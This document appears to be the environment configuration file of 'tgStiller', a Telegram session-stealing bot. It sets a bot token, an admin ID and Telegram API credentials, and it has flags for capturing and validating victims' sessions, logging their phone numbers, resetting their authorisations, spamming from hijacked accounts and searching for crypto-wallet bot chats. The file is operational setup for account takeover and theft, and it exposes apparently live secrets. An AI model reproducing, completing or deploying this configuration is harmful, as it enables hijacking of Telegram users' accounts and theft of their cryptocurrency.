BOT_NAME=tgStiller
BOT_VERSION=build_1.0
BOT_TOKEN=8179092131:AAGckn0-FVPdCB00wz8cSJGhB2EZc25uV9M
BOT_PARSE_MODE=HTML

ADMIN_ID=7413402586

TELEGRAM_API_ID=23024921
TELEGRAM_API_HASH=bfa5f70d3ad8197a265ac132657ed280

USE_PROXY=False
CHECK_VALID_SESSION=20
SPAM_IN_CONNECT_SESSION=True
SPAM_IN_RESET_AUTH=True
AUTO_CHECH_PASSWORDS=True

FIND_CHATS=@CryptoBot, @wallet, @BTC_CHANGE_BOT

LOG_ENTER_START=True
LOG_ENTER_PHONE=True
LOG_GET_SESSION=True
LOG_INVALID_SESSION=True
LOG_RESET_AUTH=True
